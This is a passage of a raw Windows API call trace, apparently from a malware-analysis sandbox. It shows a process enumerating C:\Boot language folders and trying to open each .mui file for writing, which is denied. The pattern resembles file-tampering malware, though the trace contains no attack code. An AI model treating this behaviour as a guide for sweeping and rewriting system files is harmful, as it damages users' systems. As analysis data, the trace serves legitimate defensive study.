(HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 30 [0084.275] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.275] GetLastError () returned 0x5 [0084.275] GetLastError () returned 0x5 [0084.275] SetLastError (dwErrCode=0x5) [0084.275] GetLastError () returned 0x5 [0084.275] SetLastError (dwErrCode=0x5) [0084.275] GetLastError () returned 0x5 [0084.275] SetLastError (dwErrCode=0x5) [0084.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69218, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧꾠")) returned 0 [0084.276] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.276] AreFileApisANSI () returned 1 [0084.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sk-SK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sk-SK", lpUsedDefaultChar=0x0) returned 14 [0084.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.277] AreFileApisANSI () returned 1 [0084.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88720 [0084.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sk-SK") returned 14 [0084.277] CreateFileW (lpFileName="C:\\Boot\\sk-SK" (normalized: "c:\\boot\\sk-sk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.277] GetLastError () returned 0x5 [0084.277] GetLastError () returned 0x5 [0084.277] SetLastError (dwErrCode=0x5) [0084.277] GetLastError () returned 0x5 [0084.277] SetLastError (dwErrCode=0x5) [0084.277] GetLastError () returned 0x5 [0084.277] SetLastError (dwErrCode=0x5) [0084.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.277] AreFileApisANSI () returned 1 [0084.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0084.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sk-SK") returned 14 [0084.278] CreateFileW (lpFileName="C:\\Boot\\sk-SK" (normalized: "c:\\boot\\sk-sk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.278] GetLastError () returned 0x5 [0084.278] GetLastError () returned 0x5 [0084.278] SetLastError (dwErrCode=0x5) [0084.278] GetLastError () returned 0x5 [0084.278] SetLastError (dwErrCode=0x5) [0084.278] GetLastError () returned 0x5 [0084.278] SetLastError (dwErrCode=0x5) [0084.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.278] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.278] FindFirstFileExW (in: lpFileName="C:\\Boot\\sk-SK\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0084.278] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.278] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.279] AreFileApisANSI () returned 1 [0084.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.280] AreFileApisANSI () returned 1 [0084.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52fc8 [0084.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x52fc8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 30 [0084.280] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.280] GetFileType (hFile=0x348) returned 0x1 [0084.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.280] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.280] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.280] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.281] CloseHandle (hObject=0x348) returned 1 [0084.281] AreFileApisANSI () returned 1 [0084.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 30 [0084.281] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.281] GetLastError () returned 0x5 [0084.281] GetLastError () returned 0x5 [0084.281] SetLastError (dwErrCode=0x5) [0084.281] GetLastError () returned 0x5 [0084.281] SetLastError (dwErrCode=0x5) [0084.281] GetLastError () returned 0x5 [0084.281] SetLastError (dwErrCode=0x5) [0084.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.281] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ⵘ\x01⺊Ā")) returned 0 [0084.281] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.282] AreFileApisANSI () returned 1 [0084.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sl-SI", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sl-SI", lpUsedDefaultChar=0x0) returned 14 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.282] AreFileApisANSI () returned 1 [0084.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0084.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sl-SI") returned 14 [0084.283] CreateFileW (lpFileName="C:\\Boot\\sl-SI" (normalized: "c:\\boot\\sl-si"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.283] GetLastError () returned 0x5 [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.283] AreFileApisANSI () returned 1 